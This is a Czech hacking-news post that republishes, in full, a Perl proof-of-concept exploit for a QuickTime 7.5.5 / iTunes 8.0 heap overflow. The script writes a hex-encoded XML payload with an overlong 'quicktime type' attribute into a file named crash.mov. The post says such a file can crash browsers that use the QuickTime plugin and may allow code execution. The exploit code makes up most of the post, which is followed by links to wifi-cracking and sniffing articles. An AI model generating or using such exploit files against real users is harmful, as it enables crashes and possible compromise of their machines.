Na ruském webu securitylab byl publikován zajímavý a hlavně aktuální perl exploit Quicktime 7.5.5 Itunes 8.0 Remote Heap Overflow Crash. Myslím, že bude brzo vydán i na serveru secunia, securityfocus nebo milw0rm (odkus lze aktualizovat instalovanou databázi exploitů pro Framework Metasploit 2 i 3. Pokud se vám nechce čekat, na konci textu je uveden zdroj informace a pod novinkou i zdrojový kód, tak jak by publikován.
Zdrojový kód Remote Heap Overflow Crash exploitu:
###############################################################################
# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash
# Vendor: http://www.apple.com/
# Risk : high
#
# The „<? quicktime type= ?>“ tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding
# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
# remote crash on firefox, IE and any browser using the Quicktime plugin.
# Code execution may be possible.
my $payload =
„\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f“.
„\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d“.
„\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b“.
„\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″.
„\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e“.
„\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f“.
„\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d“.
„\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76″.
„\x65\x72\x22\x20\x2f\x3e\x00″;my $file=“crash.mov“;
open(my $file, „>>$file“) or die „Cannot open $file: $!“;
print $file $payload;
close($file);
Zdroj securitylab.
Odkaz vede do sekce Diskuze článků a tutoriálů – komentáře směrujte do příslušné diskuze.
Kam dál?
- + BackTrack Video – Návod pro WEP Crack
+ Bezdrátový odposlech počítačové klávesnice
+ Byl vydán cracker zabezpečení wifi sítí aircrack-ng 0.9
+ Metasploit 3.4.0 Hacking Framework – víc jak 100 nových Exploitů
+ AIRcable Host XR nejvýkonnější CSR BlueCore 04 čip na AMP
+ Mobilní jednotka pro pentesting (crack) WiFi sítí – EmeritHacks
+ Kód afrag, MDK a Ska – Fragmentační útok
+ Goosh.org – neoficiální google shell
+ VoIPong Sniffing internetové telefonie
+ WiFi karta Alfa AWUS036NH 2000mW minirecenze + foto
+ Crack WPA-PSK – Nvidia CUDA Ubuntu 10.04 LTS – Pyrit & Cowpatty
+ Airoscript – WEP crack skript
+ BackTrack 5 Revolution [EN] ke stažení
+ Prolomení WPA zabezpečení pomocí HASHe
+ Červ psyb0t – Linux router v domácí síti jako zombie botnetu
+ aircrack-ng s podporou pyrit passthrough – wifi hacking
+ Metasploit Framework 3.1 download
+ CarrierIQ & Android Phone + je Váš telefón skutečně Váš?
+ Doručení médii (DVD, pack, full pack) Praha, ČR kurýrem
+ Sniffing a analýza WiFi sítě – Nápověda pro Kismet NewCore
